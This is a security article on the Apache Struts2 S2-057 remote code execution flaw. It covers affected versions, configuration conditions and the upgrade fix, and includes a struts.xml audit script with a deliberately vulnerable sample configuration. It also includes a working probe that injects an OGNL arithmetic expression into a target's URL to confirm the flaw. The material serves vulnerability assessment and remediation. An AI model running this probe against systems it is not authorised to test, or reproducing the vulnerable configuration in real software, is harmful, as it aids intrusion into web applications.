Shulou (Shulou.com) 06/01 report, updated 2025-04-04. Source: SLTechnology News & Howtos, Internet Technology section.
This article walks through how to analyse the Apache Struts2 S2-057 vulnerability. Many readers may not be familiar with it, so the following summary has been put together to make it easier to follow; I hope you take something away from it.
It is possible to perform an RCE attack when the namespace value is not set for a result defined in the underlying XML configuration and, at the same time, its upper action configuration has no namespace or a wildcard namespace. The same is possible when using a url tag that has no value and action set while, at the same time, its upper action configuration has no namespace or a wildcard namespace. - Apache Struts2 team
On August 23, 2018, the Apache Struts2 project published a security announcement for a high-risk remote code execution vulnerability, reported by researchers of the Semmle Security Research team and assigned CVE-2018-11776 (S2-057). Remote code execution is possible when a result in the XML configuration has no namespace set and the enclosing action configuration either has no namespace or uses a wildcard namespace: in that case the namespace is taken from the request URL and evaluated as an OGNL expression.
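To make the configuration condition concrete, here is an added audit script (written for this article, not code from the Struts project or the original post) that scans a struts.xml for the pattern the advisory describes: a package with no namespace or a wildcard namespace, containing an action whose redirectAction or chain result has no explicit namespace param. The two sample configurations embedded in it are constructed for illustration; the set of result types it checks, and the hardened form that pins a namespace on both the package and the result, are assumptions based on the advisory's workaround rather than anything stated on this page.

```python
"""Audit a struts.xml for the S2-057 (CVE-2018-11776) configuration pattern.

Flags redirectAction/chain results that carry no explicit namespace while the
enclosing package has no namespace or a wildcard namespace: the combination in
which the namespace comes from the request URL and is evaluated as OGNL.
"""
import sys
import xml.etree.ElementTree as ET

# Result types whose target namespace falls back to the request's namespace when
# no <param name="namespace"> is configured. Assumption: only the two result types
# named in the advisory (redirectAction, chain) are checked here.
REDIRECTING_RESULT_TYPES = {"redirectAction", "chain"}


def package_namespace_is_risky(namespace):
    """A missing/empty namespace or a wildcard namespace lets the request choose it."""
    return namespace is None or namespace.strip() == "" or "*" in namespace


def result_has_explicit_namespace(result):
    """True when the result pins its target with a <param name="namespace">."""
    return any(p.get("name") == "namespace" for p in result.findall("param"))


def find_s2_057_candidates(struts_xml):
    """Return (package, action, result name, result type) tuples matching the pattern.

    A real struts.xml usually starts with a DOCTYPE pointing at the Struts DTD;
    ElementTree accepts it without fetching the external DTD.
    """
    findings = []
    root = ET.fromstring(struts_xml)
    for pkg in root.iter("package"):
        if not package_namespace_is_risky(pkg.get("namespace")):
            continue  # an explicit, non-wildcard namespace is not attacker-controlled
        for action in pkg.findall("action"):
            for result in action.findall("result"):
                rtype = result.get("type", "dispatcher")
                if rtype in REDIRECTING_RESULT_TYPES and not result_has_explicit_namespace(result):
                    findings.append((pkg.get("name"), action.get("name"),
                                     result.get("name", "success"), rtype))
    return findings


# Constructed sample (not from any real application): the vulnerable shape, with
# packages lacking a namespace or using a wildcard, and results without a namespace param.
VULNERABLE_STRUTS_XML = """\
<struts>
  <package name="default" extends="struts-default">
    <action name="actionChain1" class="com.example.Chain1Action">
      <result type="chain">actionChain2</result>
    </action>
    <action name="help" class="com.example.HelpAction">
      <result type="redirectAction">date</result>
    </action>
    <action name="pinned" class="com.example.PinnedAction">
      <result type="redirectAction">
        <param name="actionName">date</param>
        <param name="namespace">/date</param>
      </result>
    </action>
  </package>
  <package name="wild" namespace="/*" extends="struts-default">
    <action name="go" class="com.example.GoAction">
      <result type="redirectAction">home</result>
    </action>
  </package>
</struts>
"""

# Constructed sample: the hardened shape, following the advisory's workaround of
# fixing a namespace on every package and on every redirecting result.
HARDENED_STRUTS_XML = """\
<struts>
  <package name="default" namespace="/app" extends="struts-default">
    <action name="actionChain1" class="com.example.Chain1Action">
      <result type="chain">
        <param name="actionName">actionChain2</param>
        <param name="namespace">/app</param>
      </result>
    </action>
    <action name="help" class="com.example.HelpAction">
      <result type="redirectAction">
        <param name="actionName">date</param>
        <param name="namespace">/app</param>
      </result>
    </action>
  </package>
</struts>
"""

if __name__ == "__main__":
    # Usage: python s2_057_audit.py [path/to/struts.xml]; defaults to the vulnerable sample.
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else VULNERABLE_STRUTS_XML
    for pkg, action, result, rtype in find_s2_057_candidates(xml_text):
        print(f"package={pkg} action={action} result={result} type={rtype}: no explicit namespace")
```

Running it against the vulnerable sample reports the chain result of actionChain1, the redirectAction result of help, and the redirectAction result in the wildcard package, while the pinned action and the whole hardened sample produce no findings. This is a configuration check only; it does not prove exploitability on a given deployment.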
0x01 Vulnerability exposure
CVE-2018-11776 is rated high risk, but its practical reach is limited: the configuration conditions described above must be met for it to be exploitable.
Affected versions
Struts 2.3 to 2.3.34
Struts 2.5 to 2.5.16
Fixed versions
Struts 2.3.35 and Struts 2.5.17
0x02 Vulnerability verification
Pass an OGNL arithmetic expression built from the number 2333 (for example ${2333+2333}) in the namespace segment of the request URL, in front of the action name.
Because the namespace is not fixed in the configuration, the value from the URL is taken as the namespace and handed to the OGNL evaluator, which executes it.
The evaluated result (4666 for the example above) is then written back into the redirect URL in the Location header, which confirms that the expression was executed.
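The verification step above, as an added, non-destructive checker written for this article (not code from the original post or from the Struts project): it places an arithmetic expression in the namespace segment, stops the redirect from being followed, and looks for the evaluated sum in the Location header. The action path actionChain1.action, the percent-encoding of the braces, and the expectation of a 3xx response with a Location header are assumptions; adjust the action to one on the target whose result redirects.

```python
"""Non-destructive check for S2-057: send an arithmetic OGNL expression in the
namespace segment and look for its evaluated value in the redirect target.

Assumptions (not from the original article): the target exposes an action whose
result redirects (actionChain1.action here, as in the Struts showcase), and the
server answers the probe with a 3xx carrying a Location header.
"""
import sys
import urllib.error
import urllib.request
from urllib.parse import quote, unquote, urlsplit


def build_probe_url(base_url, action_path="actionChain1.action", lhs=2333, rhs=2333):
    """Place ${lhs+rhs} where the namespace would be. The expression is
    percent-encoded because servlet containers such as Tomcat reject raw
    '{' and '}' in the request target unless configured otherwise."""
    expression = "${" + f"{lhs}+{rhs}" + "}"
    return f"{base_url.rstrip('/')}/{quote(expression, safe='')}/{action_path}"


def location_shows_evaluation(location, expected):
    """True when the Location header carries the arithmetic result as a path
    segment and no longer contains the literal ${...}: the expression was
    evaluated server-side rather than echoed back unchanged."""
    if not location:
        return False
    segments = [s for s in urlsplit(location).path.split("/") if s]
    return str(expected) in segments and "${" not in unquote(location)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following the redirect so the Location header can be read."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url, action_path="actionChain1.action", lhs=2333, rhs=2333, timeout=10):
    """Return (verdict, location). verdict is True only if lhs+rhs shows up in Location."""
    url = build_probe_url(base_url, action_path, lhs, rhs)
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            location = resp.headers.get("Location")  # non-redirect response
    except urllib.error.HTTPError as err:
        location = err.headers.get("Location")       # 3xx surfaces here when not followed
    except urllib.error.URLError:
        return False, None
    return location_shows_evaluation(location, lhs + rhs), location


if __name__ == "__main__":
    # Usage: python s2_057_probe.py http://target:8080/struts2-showcase
    verdict, location = probe(sys.argv[1])
    print("Location:", location)
    print("expression evaluated (vulnerable):", verdict)
```

The check deliberately uses arithmetic rather than a command-executing payload: a redirect to /4666/... is sufficient evidence that the namespace went through OGNL, and it leaves nothing behind on the target. A redirect that still contains the literal expression, or no redirect at all, is reported as not vulnerable.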
0x03 Remediation advice
The official recommendation is to upgrade Struts to version 2.3.35 or 2.5.17.
According to the announcement, this update introduces no compatibility issues.
If the upgrade cannot be deployed immediately, the official advisory's workaround applies: always specify a namespace for every result defined in the configuration, and always set both value and action on every url tag in JSPs, so that no namespace is ever taken from the request.